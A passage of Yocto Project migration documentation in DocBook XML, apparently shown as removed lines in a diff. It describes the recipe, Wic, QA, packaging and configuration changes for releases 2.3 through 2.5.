- Functionally replaced by <filename>dnf</filename>.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>createrepo:</filename></emphasis>
- Replaced by the <filename>createrepo-c</filename> recipe.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>rpmresolve:</filename></emphasis>
- No longer needed with the move to RPM 4 as RPM itself is
- used instead.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>gstreamer:</filename></emphasis>
- Removed the GStreamer Git version recipes as they have
- been stale.
- <filename>1.10.</filename><replaceable>x</replaceable>
- recipes are still present.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>alsa-conf-base:</filename></emphasis>
- Merged into <filename>alsa-conf</filename> since
- <filename>libasound</filename> depended on both.
- Essentially, no way existed to install only one of these.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>tremor:</filename></emphasis>
- Moved to <filename>meta-multimedia</filename>.
- Fixed-integer Vorbis decoding is not
- needed by current hardware.
- Thus, GStreamer's ivorbis plugin has been disabled
- by default eliminating the need for the
- <filename>tremor</filename> recipe in
- <link linkend='oe-core'>OE-Core</link>.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>gummiboot:</filename></emphasis>
- Replaced by <filename>systemd-boot</filename>.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.3-wic-changes'>
- <title>Wic Changes</title>
-
- <para>
- The following changes have been made to Wic:
- <note>
- For more information on Wic, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-partitioned-images-using-wic'>Creating Partitioned Images Using Wic</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </note>
- <itemizedlist>
- <listitem><para>
- <emphasis>Default Output Directory Changed:</emphasis>
- Wic's default output directory is now the current directory
- by default instead of the unusual
- <filename>/var/tmp/wic</filename>.</para>
-
- <para>The "-o" and "--outdir" options remain unchanged
- and are used to specify your preferred output directory
- if you do not want to use the default directory.
- </para></listitem>
- <listitem><para>
- <emphasis>fsimage Plug-in Removed:</emphasis>
- The Wic fsimage plugin has been removed as it duplicates
- functionality of the rawcopy plugin.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.3-qa-changes'>
- <title>QA Changes</title>
-
- <para>
- The following QA checks have changed:
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>unsafe-references-in-binaries</filename>:</emphasis>
- The <filename>unsafe-references-in-binaries</filename>
- QA check, which was disabled by default, has now been
- removed.
- This check was intended to detect binaries in
- <filename>/bin</filename> that link to libraries in
- <filename>/usr/lib</filename> and have the case where
- the user has <filename>/usr</filename> on a separate
- filesystem to <filename>/</filename>.</para>
-
- <para>The removed QA check was buggy.
- Additionally, <filename>/usr</filename> residing on a
- separate partition from <filename>/</filename> is now
- a rare configuration.
- Consequently,
- <filename>unsafe-references-in-binaries</filename> was
- removed.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>file-rdeps</filename>:</emphasis>
- The <filename>file-rdeps</filename> QA check is now an
- error by default instead of a warning.
- Because it is an error instead of a warning, you need to
- address missing runtime dependencies.</para>
-
- <para>For additional information, see the
- <link linkend='ref-classes-insane'><filename>insane</filename></link>
- class and the
- "<link linkend='qa-errors-and-warnings'>Errors and Warnings</link>"
- section.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.3-miscellaneous-changes'>
- <title>Miscellaneous Changes</title>
-
- <para>
- The following miscellaneous changes have occurred:
- <itemizedlist>
- <listitem><para>
- In this release, a number of recipes have been changed to
- ignore the <filename>largefile</filename>
- <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>
- item, enabling large file support unconditionally.
- This feature has always been enabled by default.
- Disabling the feature has not been widely tested.
- <note>
- Future releases of the Yocto Project will remove
- entirely the ability to disable the
- <filename>largefile</filename> feature,
- which would make it unconditionally enabled everywhere.
- </note>
- </para></listitem>
- <listitem><para>
- If the
- <link linkend='var-DISTRO_VERSION'><filename>DISTRO_VERSION</filename></link>
- value contains the value of the
- <link linkend='var-DATE'><filename>DATE</filename></link>
- variable, which is the default between Poky releases,
- the <filename>DATE</filename> value is explicitly excluded
- from <filename>/etc/issue</filename> and
- <filename>/etc/issue.net</filename>, which is displayed at
- the login prompt, in order to avoid conflicts with
- Multilib enabled.
- Regardless, the <filename>DATE</filename> value is
- inaccurate if the <filename>base-files</filename>
- recipe is restored from shared state (sstate) rather
- than rebuilt.</para>
-
- <para>If you need the build date recorded in
- <filename>/etc/issue*</filename> or anywhere else in your
- image, a better method is to define a post-processing
- function to do it and have the function called from
- <link linkend='var-ROOTFS_POSTPROCESS_COMMAND'><filename>ROOTFS_POSTPROCESS_COMMAND</filename></link>.
- Doing so ensures the value is always up-to-date with the
- created image.
- </para></listitem>
- <listitem><para>
- Dropbear's <filename>init</filename> script now disables
- DSA host keys by default.
- This change is in line with the systemd service
- file, which supports RSA keys only, and with recent
- versions of OpenSSH, which deprecates DSA host keys.
- </para></listitem>
- <listitem><para>
- The
- <link linkend='ref-classes-buildhistory'><filename>buildhistory</filename></link>
- class now correctly uses tabs as separators between all
- columns in <filename>installed-package-sizes.txt</filename>
- in order to aid import into other tools.
- </para></listitem>
- <listitem><para>
- The <filename>USE_LDCONFIG</filename> variable has been
- replaced with the "ldconfig"
- <filename>DISTRO_FEATURES</filename> feature.
- Distributions that previously set:
- <literallayout class='monospaced'>
- USE_LDCONFIG = "0"
- </literallayout>
- should now instead use the following:
- <literallayout class='monospaced'>
- DISTRO_FEATURES_BACKFILL_CONSIDERED_append = " ldconfig"
- </literallayout>
- </para></listitem>
- <listitem><para>
- The default value of
- <link linkend='var-COPYLEFT_LICENSE_INCLUDE'><filename>COPYLEFT_LICENSE_INCLUDE</filename></link>
- now includes all versions of AGPL licenses in addition
- to GPL and LGPL.
- <note>
- The default list is not intended to be guaranteed
- as a complete safe list.
- You should seek legal advice based on what you are
- distributing if you are unsure.
- </note>
- </para></listitem>
- <listitem><para>
- Kernel module packages are now suffixed with the kernel
- version in order to allow module packages from multiple
- kernel versions to co-exist on a target system.
- If you wish to return to the previous naming scheme
- that does not include the version suffix, use the
- following:
- <literallayout class='monospaced'>
- KERNEL_MODULE_PACKAGE_SUFFIX to ""
- </literallayout>
- </para></listitem>
- <listitem><para>
- Removal of <filename>libtool</filename>
- <filename>*.la</filename> files is now enabled by default.
- The <filename>*.la</filename> files are not actually
- needed on Linux and relocating them is an unnecessary
- burden.</para>
-
- <para>If you need to preserve these
- <filename>.la</filename> files (e.g. in a custom
- distribution), you must change
- <link linkend='var-INHERIT_DISTRO'><filename>INHERIT_DISTRO</filename></link>
- such that "remove-libtool" is not included in the value.
- </para></listitem>
- <listitem><para>
- Extensible SDKs built for GCC 5+ now refuse to install on a
- distribution where the host GCC version is 4.8 or 4.9.
- This change resulted from the fact that the installation
- is known to fail due to the way the
- <filename>uninative</filename> shared state (sstate)
- package is built.
- See the
- <link linkend='ref-classes-uninative'><filename>uninative</filename></link>
- class for additional information.
- </para></listitem>
- <listitem><para>
- All native and nativesdk recipes now use a separate
- <filename>DISTRO_FEATURES</filename> value instead of
- sharing the value used by recipes for the target, in order
- to avoid unnecessary rebuilds.</para>
-
- <para>The <filename>DISTRO_FEATURES</filename> for
- <filename>native</filename> recipes is
- <link linkend='var-DISTRO_FEATURES_NATIVE'><filename>DISTRO_FEATURES_NATIVE</filename></link>
- added to an intersection of
- <filename>DISTRO_FEATURES</filename> and
- <link linkend='var-DISTRO_FEATURES_FILTER_NATIVE'><filename>DISTRO_FEATURES_FILTER_NATIVE</filename></link>.
- </para>
-
- <para>For nativesdk recipes, the
- corresponding variables are
- <link linkend='var-DISTRO_FEATURES_NATIVESDK'><filename>DISTRO_FEATURES_NATIVESDK</filename></link>
- and
- <link linkend='var-DISTRO_FEATURES_FILTER_NATIVESDK'><filename>DISTRO_FEATURES_FILTER_NATIVESDK</filename></link>.
- </para></listitem>
- <listitem><para>
- The <filename>FILESDIR</filename>
- variable, which was previously deprecated and rarely used,
- has now been removed.
- You should change any recipes that set
- <filename>FILESDIR</filename> to set
- <link linkend='var-FILESPATH'><filename>FILESPATH</filename></link>
- instead.
- </para></listitem>
- <listitem><para>
- The <filename>MULTIMACH_HOST_SYS</filename>
- variable has been removed as it is no longer needed
- with recipe-specific sysroots.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-</section>
-
-<section id='moving-to-the-yocto-project-2.4-release'>
- <title>Moving to the Yocto Project 2.4 Release</title>
-
- <para>
- This section provides migration information for moving to the
- Yocto Project 2.4 Release from the prior release.
- </para>
-
- <section id='migration-2.4-memory-resident-mode'>
- <title>Memory Resident Mode</title>
-
- <para>
- A persistent mode is now available in BitBake's default operation,
- replacing its previous "memory resident mode" (i.e.
- <filename>oe-init-build-env-memres</filename>).
- Now you only need to set
- <link linkend='var-BB_SERVER_TIMEOUT'><filename>BB_SERVER_TIMEOUT</filename></link>
- to a timeout (in seconds) and BitBake's server stays resident for
- that amount of time between invocations.
- The <filename>oe-init-build-env-memres</filename> script has been
- removed since a separate environment setup script is no longer
- needed.
- </para>
- </section>
-
- <section id='migration-2.4-packaging-changes'>
- <title>Packaging Changes</title>
-
- <para>
- This section provides information about packaging changes that have
- occurred:
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>python3</filename> Changes:</emphasis>
- <itemizedlist>
- <listitem><para>
- The main "python3" package now brings in all of the
- standard Python 3 distribution rather than a subset.
- This behavior matches what is expected based on
- traditional Linux distributions.
- If you wish to install a subset of Python 3, specify
- <filename>python-core</filename> plus one or more of
- the individual packages that are still produced.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>python3</filename>:</emphasis>
- The <filename>bz2.py</filename>,
- <filename>lzma.py</filename>, and
- <filename>_compression.py</filename> scripts have
- been moved from the
- <filename>python3-misc</filename> package to
- the <filename>python3-compression</filename> package.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <emphasis><filename>binutils</filename>:</emphasis>
- The <filename>libbfd</filename> library is now packaged in
- a separate "libbfd" package.
- This packaging saves space when certain tools
- (e.g. <filename>perf</filename>) are installed.
- In such cases, the tools only need
- <filename>libbfd</filename> rather than all the packages in
- <filename>binutils</filename>.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>util-linux</filename> Changes:</emphasis>
- <itemizedlist>
- <listitem><para>
- The <filename>su</filename> program is now packaged
- in a separate "util-linux-su" package, which is only
- built when "pam" is listed in the
- <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>
- variable.
- <filename>util-linux</filename> should not be
- installed unless it is needed because
- <filename>su</filename> is normally provided through
- the shadow file format.
- The main <filename>util-linux</filename> package has
- runtime dependencies (i.e.
- <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>)
- on the <filename>util-linux-su</filename> package
- when "pam" is in
- <filename>DISTRO_FEATURES</filename>.
- </para></listitem>
- <listitem><para>
- The <filename>switch_root</filename> program is now
- packaged in a separate "util-linux-switch-root"
- package for small initramfs images that do not need
- the whole <filename>util-linux</filename> package or
- the busybox binary, which are both much larger than
- <filename>switch_root</filename>.
- The main <filename>util-linux</filename> package has
- a recommended runtime dependency (i.e.
- <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>)
- on the <filename>util-linux-switch-root</filename> package.
- </para></listitem>
- <listitem><para>
- The <filename>ionice</filename> program is now
- packaged in a separate "util-linux-ionice" package.
- The main <filename>util-linux</filename> package has
- a recommended runtime dependency (i.e.
- <filename>RRECOMMENDS</filename>)
- on the <filename>util-linux-ionice</filename> package.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <emphasis><filename>initscripts</filename>:</emphasis>
- The <filename>sushell</filename> program is now packaged in
- a separate "initscripts-sushell" package.
- This packaging change allows systems to pull
- <filename>sushell</filename> in when
- <filename>selinux</filename> is enabled.
- The change also eliminates needing to pull in the entire
- <filename>initscripts</filename> package.
- The main <filename>initscripts</filename> package has a
- runtime dependency (i.e. <filename>RDEPENDS</filename>)
- on the <filename>sushell</filename> package when
- "selinux" is in <filename>DISTRO_FEATURES</filename>.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>glib-2.0</filename>:</emphasis>
- The <filename>glib-2.0</filename> package now has a
- recommended runtime dependency (i.e.
- <filename>RRECOMMENDS</filename>) on the
- <filename>shared-mime-info</filename> package, since large
- portions of GIO are not useful without the MIME database.
- You can remove the dependency by using the
- <link linkend='var-BAD_RECOMMENDATIONS'><filename>BAD_RECOMMENDATIONS</filename></link>
- variable if <filename>shared-mime-info</filename> is too
- large and is not required.
- </para></listitem>
- <listitem><para>
- <emphasis>Go Standard Runtime:</emphasis>
- The Go standard runtime has been split out from the main
- <filename>go</filename> recipe into a separate
- <filename>go-runtime</filename> recipe.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.4-removed-recipes'>
- <title>Removed Recipes</title>
-
- <para>
- The following recipes have been removed:
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>acpitests</filename>:</emphasis>
- This recipe is not maintained.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>autogen-native</filename>:</emphasis>
- No longer required by Grub, oe-core, or meta-oe.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>bdwgc</filename>:</emphasis>
- Nothing in OpenEmbedded-Core requires this recipe.
- It has moved to meta-oe.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>byacc</filename>:</emphasis>
- This recipe was only needed by rpm 5.x and has moved to
- meta-oe.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>gcc (5.4)</filename>:</emphasis>
- The 5.4 series dropped the recipe in favor of 6.3 / 7.2.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>gnome-common</filename>:</emphasis>
- Deprecated upstream and no longer needed.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>go-bootstrap-native</filename>:</emphasis>
- Go 1.9 does its own bootstrapping so this recipe has been
- removed.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>guile</filename>:</emphasis>
- This recipe was only needed by
- <filename>autogen-native</filename> and
- <filename>remake</filename>.
- The recipe is no longer needed by either of these programs.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>libclass-isa-perl</filename>:</emphasis>
- This recipe was previously needed for LSB 4, no longer
- needed.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>libdumpvalue-perl</filename>:</emphasis>
- This recipe was previously needed for LSB 4, no longer
- needed.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>libenv-perl</filename>:</emphasis>
- This recipe was previously needed for LSB 4, no longer
- needed.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>libfile-checktree-perl</filename>:</emphasis>
- This recipe was previously needed for LSB 4, no longer
- needed.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>libi18n-collate-perl</filename>:</emphasis>
- This recipe was previously needed for LSB 4, no longer
- needed.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>libiconv</filename>:</emphasis>
- This recipe was only needed for <filename>uclibc</filename>,
- which was removed in the previous release.
- <filename>glibc</filename> and <filename>musl</filename>
- have their own implementations.
- <filename>meta-mingw</filename> still needs
- <filename>libiconv</filename>, so it has
- been moved to <filename>meta-mingw</filename>.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>libpng12</filename>:</emphasis>
- This recipe was previously needed for LSB. The current
- <filename>libpng</filename> is 1.6.x.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>libpod-plainer-perl</filename>:</emphasis>
- This recipe was previously needed for LSB 4, no longer
- needed.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>linux-yocto (4.1)</filename>:</emphasis>
- This recipe was removed in favor of 4.4, 4.9, 4.10 and 4.12.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>mailx</filename>:</emphasis>
- This recipe was previously only needed for LSB
- compatibility, and upstream is defunct.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>mesa (git version only)</filename>:</emphasis>
- The git version recipe was stale with respect to the release
- version.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>ofono (git version only)</filename>:</emphasis>
- The git version recipe was stale with respect to the release
- version.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>portmap</filename>:</emphasis>
- This recipe is obsolete and is superseded by
- <filename>rpcbind</filename>.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>python3-pygpgme</filename>:</emphasis>
- This recipe is old and unmaintained. It was previously
- required by <filename>dnf</filename>, which has switched
- to official <filename>gpgme</filename> Python bindings.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>python-async</filename>:</emphasis>
- This recipe has been removed in favor of the Python 3
- version.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>python-gitdb</filename>:</emphasis>
- This recipe has been removed in favor of the Python 3
- version.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>python-git</filename>:</emphasis>
- This recipe was removed in favor of the Python 3
- version.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>python-mako</filename>:</emphasis>
- This recipe was removed in favor of the Python 3
- version.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>python-pexpect</filename>:</emphasis>
- This recipe was removed in favor of the Python 3 version.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>python-ptyprocess</filename>:</emphasis>
- This recipe was removed in favor of Python the 3 version.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>python-pycurl</filename>:</emphasis>
- Nothing is using this recipe in OpenEmbedded-Core
- (i.e. <filename>meta-oe</filename>).
- </para></listitem>
- <listitem><para>
- <emphasis><filename>python-six</filename>:</emphasis>
- This recipe was removed in favor of the Python 3 version.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>python-smmap</filename>:</emphasis>
- This recipe was removed in favor of the Python 3 version.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>remake</filename>:</emphasis>
- Using <filename>remake</filename> as the provider of
- <filename>virtual/make</filename> is broken.
- Consequently, this recipe is not needed in OpenEmbedded-Core.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.4-kernel-device-tree-move'>
- <title>Kernel Device Tree Move</title>
-
- <para>
- Kernel Device Tree support is now easier to enable in a kernel
- recipe.
- The Device Tree code has moved to a
- <link linkend='ref-classes-kernel-devicetree'><filename>kernel-devicetree</filename></link>
- class.
- Functionality is automatically enabled for any recipe that inherits
- the
- <link linkend='ref-classes-kernel'><filename>kernel</filename></link>
- class and sets the
- <link linkend='var-KERNEL_DEVICETREE'><filename>KERNEL_DEVICETREE</filename></link>
- variable.
- The previous mechanism for doing this,
- <filename>meta/recipes-kernel/linux/linux-dtb.inc</filename>,
- is still available to avoid breakage, but triggers a
- deprecation warning.
- Future releases of the Yocto Project will remove
- <filename>meta/recipes-kernel/linux/linux-dtb.inc</filename>.
- It is advisable to remove any <filename>require</filename>
- statements that request
- <filename>meta/recipes-kernel/linux/linux-dtb.inc</filename>
- from any custom kernel recipes you might have.
- This will avoid breakage in post 2.4 releases.
- </para>
- </section>
-
- <section id='migration-2.4-package-qa-changes'>
- <title>Package QA Changes</title>
-
- <para>
- The following package QA changes took place:
- <itemizedlist>
- <listitem><para>
- The "unsafe-references-in-scripts" QA check has been
- removed.
- </para></listitem>
- <listitem><para>
- If you refer to <filename>${COREBASE}/LICENSE</filename>
- within
- <link linkend='var-LIC_FILES_CHKSUM'><filename>LIC_FILES_CHKSUM</filename></link>
- you receive a warning because this file is a description of
- the license for OE-Core.
- Use <filename>${COMMON_LICENSE_DIR}/MIT</filename>
- if your recipe is MIT-licensed and you cannot use the
- preferred method of referring to a file within the source
- tree.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.4-readme-changes'>
- <title><filename>README</filename> File Changes</title>
-
- <para>
- The following are changes to <filename>README</filename> files:
- <itemizedlist>
- <listitem><para>
- The main Poky <filename>README</filename> file has been
- moved to the <filename>meta-poky</filename> layer and
- has been renamed <filename>README.poky</filename>.
- A symlink has been created so that references to the old
- location work.
- </para></listitem>
- <listitem><para>
- The <filename>README.hardware</filename> file has been moved
- to <filename>meta-yocto-bsp</filename>.
- A symlink has been created so that references to the old
- location work.
- </para></listitem>
- <listitem><para>
- A <filename>README.qemu</filename> file has been created
- with coverage of the <filename>qemu*</filename> machines.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.4-miscellaneous-changes'>
- <title>Miscellaneous Changes</title>
-
- <para>
- The following are additional changes:
- <itemizedlist>
- <listitem><para>
- The <filename>ROOTFS_PKGMANAGE_BOOTSTRAP</filename>
- variable and any references to it have been removed.
- You should remove this variable from any custom recipes.
- </para></listitem>
- <listitem><para>
- The <filename>meta-yocto</filename> directory has been
- removed.
- <note>
- In the Yocto Project 2.1 release
- <filename>meta-yocto</filename> was renamed to
- <filename>meta-poky</filename> and the
- <filename>meta-yocto</filename> subdirectory remained
- to avoid breaking existing configurations.
- </note>
- </para></listitem>
- <listitem><para>
- The <filename>maintainers.inc</filename> file, which tracks
- maintainers by listing a primary person responsible for each
- recipe in OE-Core, has been moved from
- <filename>meta-poky</filename> to OE-Core (i.e. from
- <filename>meta-poky/conf/distro/include</filename> to
- <filename>meta/conf/distro/include</filename>).
- </para></listitem>
- <listitem><para>
- The
- <link linkend='ref-classes-buildhistory'><filename>buildhistory</filename></link>
- class now makes a single commit per build rather than one
- commit per subdirectory in the repository.
- This behavior assumes the commits are enabled with
- <link linkend='var-BUILDHISTORY_COMMIT'><filename>BUILDHISTORY_COMMIT</filename></link>
- = "1", which is typical.
- Previously, the <filename>buildhistory</filename> class made
- one commit per subdirectory in the repository in order to
- make it easier to see the changes for a particular
- subdirectory.
- To view a particular change, specify that subdirectory as
- the last parameter on the <filename>git show</filename>
- or <filename>git diff</filename> commands.
- </para></listitem>
- <listitem><para>
- The <filename>x86-base.inc</filename> file, which is
- included by all x86-based machine configurations, now sets
- <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>
- using <filename>?=</filename> to "live" rather than
- appending with <filename>+=</filename>.
- This change makes the default easier to override.
- </para></listitem>
- <listitem><para>
- BitBake fires multiple "BuildStarted" events when
- multiconfig is enabled (one per configuration).
- For more information, see the
- "<ulink url='&YOCTO_DOCS_BB_URL;#events'>Events</ulink>"
- section in the BitBake User Manual.
- </para></listitem>
- <listitem><para>
- By default, the <filename>security_flags.inc</filename> file
- sets a
- <link linkend='var-GCCPIE'><filename>GCCPIE</filename></link>
- variable with an option to enable Position Independent
- Executables (PIE) within <filename>gcc</filename>.
- Enabling PIE in the GNU C Compiler (GCC), makes Return
- Oriented Programming (ROP) attacks much more difficult to
- execute.
- </para></listitem>
- <listitem><para>
- OE-Core now provides a
- <filename>bitbake-layers</filename> plugin that implements
- a "create-layer" subcommand.
- The implementation of this subcommand has resulted in the
- <filename>yocto-layer</filename> script being deprecated and
- will likely be removed in the next Yocto Project release.
- </para></listitem>
- <listitem><para>
- The <filename>vmdk</filename>, <filename>vdi</filename>,
- and <filename>qcow2</filename> image file types are now
- used in conjunction with the "wic" image type through
- <filename>CONVERSION_CMD</filename>.
- Consequently, the equivalent image types are now
- <filename>wic.vmdk</filename>, <filename>wic.vdi</filename>,
- and <filename>wic.qcow2</filename>, respectively.
- </para></listitem>
- <listitem><para>
- <filename>do_image_&lt;type&gt;[depends]</filename> has
- replaced <filename>IMAGE_DEPENDS_&lt;type&gt;</filename>.
- If you have your own classes that implement custom image
- types, then you need to update them.
- </para></listitem>
- <listitem><para>
- OpenSSL 1.1 has been introduced.
- However, the default is still 1.0.x through the
- <link linkend='var-PREFERRED_VERSION'><filename>PREFERRED_VERSION</filename></link>
- variable.
- This preference is set is due to the remaining compatibility
- issues with other software.
- The
- <link linkend='var-PROVIDES'><filename>PROVIDES</filename></link>
- variable in the openssl 1.0 recipe now includes "openssl10"
- as a marker that can be used in
- <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>
- within recipes that build software that still depend on
- OpenSSL 1.0.
- </para></listitem>
- <listitem><para>
- To ensure consistent behavior, BitBake's "-r" and "-R"
- options (i.e. prefile and postfile), which are used to
- read or post-read additional configuration files from the
- command line, now only affect the current BitBake command.
- Before these BitBake changes, these options would "stick"
- for future executions.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-</section>
-
-<section id='moving-to-the-yocto-project-2.5-release'>
- <title>Moving to the Yocto Project 2.5 Release</title>
-
- <para>
- This section provides migration information for moving to the
- Yocto Project 2.5 Release from the prior release.
- </para>
-
- <section id='migration-2.5-packaging-changes'>
- <title>Packaging Changes</title>
-
- <para>
- This section provides information about packaging changes that have
- occurred:
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>bind-libs</filename>:</emphasis>
- The libraries packaged by the bind recipe are in a
- separate <filename>bind-libs</filename> package.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>libfm-gtk</filename>:</emphasis>
- The <filename>libfm</filename> GTK+ bindings are split into
- a separate <filename>libfm-gtk</filename> package.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>flex-libfl</filename>:</emphasis>
- The flex recipe splits out libfl into a separate
- <filename>flex-libfl</filename> package to avoid too many
- dependencies being pulled in where only the library is
- needed.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>grub-efi</filename>:</emphasis>
- The <filename>grub-efi</filename> configuration is split
- into a separate <filename>grub-bootconf</filename>
- recipe.
- However, the dependency relationship from
- <filename>grub-efi</filename> is through a
- virtual/grub-bootconf provider making it possible to have
- your own recipe provide the dependency.
- Alternatively, you can use a BitBake append file to bring
- the configuration back into the
- <filename>grub-efi</filename> recipe.
- </para></listitem>
- <listitem><para>
- <emphasis>armv7a Legacy Package Feed Support:</emphasis>
- Legacy support is removed for transitioning from
- <filename>armv7a</filename> to
- <filename>armv7a-vfp-neon</filename> in package feeds,
- which was previously enabled by setting
- <filename>PKGARCHCOMPAT_ARMV7A</filename>.
- This transition occurred in 2011 and active package feeds
- should by now be updated to the new naming.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.5-removed-recipes'>
- <title>Removed Recipes</title>
-
- <para>
- The following recipes have been removed:
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>gcc</filename>:</emphasis>
- The version 6.4 recipes are replaced by 7.x.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>gst-player</filename>:</emphasis>
- Renamed to <filename>gst-examples</filename> as per
- upstream.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>hostap-utils</filename>:</emphasis>
- This software package is obsolete.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>latencytop</filename>:</emphasis>
- This recipe is no longer maintained upstream.
- The last release was in 2009.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>libpfm4</filename>:</emphasis>
- The only file that requires this recipe is
- <filename>oprofile</filename>, which has been removed.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>linux-yocto</filename>:</emphasis>
- The version 4.4, 4.9, and 4.10 recipes have been removed.
- Versions 4.12, 4.14, and 4.15 remain.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>man</filename>:</emphasis>
- This recipe has been replaced by modern
- <filename>man-db</filename>
- </para></listitem>
- <listitem><para>
- <emphasis><filename>mkelfimage</filename>:</emphasis>
- This tool has been removed in the upstream coreboot project,
- and is no longer needed with the removal of the ELF image
- type.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>nativesdk-postinst-intercept</filename>:</emphasis>
- This recipe is not maintained.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>neon</filename>:</emphasis>
- This software package is no longer maintained upstream and
- is no longer needed by anything in OpenEmbedded-Core.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>oprofile</filename>:</emphasis>
- The functionality of this recipe is replaced by
- <filename>perf</filename> and keeping compatibility on
- an ongoing basis with <filename>musl</filename> is
- difficult.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>pax</filename>:</emphasis>
- This software package is obsolete.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>stat</filename>:</emphasis>
- This software package is not maintained upstream.
- <filename>coreutils</filename> provides a modern stat binary.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>zisofs-tools-native</filename>:</emphasis>
- This recipe is no longer needed because the compressed
- ISO image feature has been removed.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.5-scripts-and-tools-changes'>
- <title>Scripts and Tools Changes</title>
-
- <para>
- The following are changes to scripts and tools:
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>yocto-bsp</filename>,
- <filename>yocto-kernel</filename>, and
- <filename>yocto-layer</filename></emphasis>:
- The <filename>yocto-bsp</filename>,
- <filename>yocto-kernel</filename>, and
- <filename>yocto-layer</filename> scripts previously shipped
- with poky but not in OpenEmbedded-Core have been removed.
- These scripts are not maintained and are outdated.
- In many cases, they are also limited in scope.
- The <filename>bitbake-layers create-layer</filename> command
- is a direct replacement for <filename>yocto-layer</filename>.
- See the documentation to create a BSP or kernel recipe in
- the
- "<ulink url='&YOCTO_DOCS_BSP_URL;#bsp-kernel-recipe-example'>BSP Kernel Recipe Example</ulink>"
- section.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>devtool finish</filename>:</emphasis>
- <filename>devtool finish</filename> now exits with an error
- if there are uncommitted changes or a rebase/am in progress
- in the recipe's source repository.
- If this error occurs, there might be uncommitted changes
- that will not be included in updates to the patches applied
- by the recipe.
- A -f/--force option is provided for situations that the
- uncommitted changes are inconsequential and you want to
- proceed regardless.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>scripts/oe-setup-rpmrepo</filename> script:</emphasis>
- The functionality of
- <filename>scripts/oe-setup-rpmrepo</filename> is replaced by
- <filename>bitbake package-index</filename>.
- </para></listitem>
- <listitem><para>
